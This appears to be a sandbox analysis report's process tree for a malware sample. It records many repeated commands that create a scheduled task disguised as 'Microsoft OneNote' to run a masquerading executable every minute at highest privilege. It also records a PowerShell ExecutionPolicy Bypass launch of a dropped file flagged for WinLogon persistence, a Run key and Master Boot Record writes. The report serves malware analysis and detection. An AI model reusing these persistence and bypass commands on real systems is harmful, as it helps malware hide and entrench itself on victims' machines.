                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies WinLogon for persistence
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Writes to the Master Boot Record (MBR)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
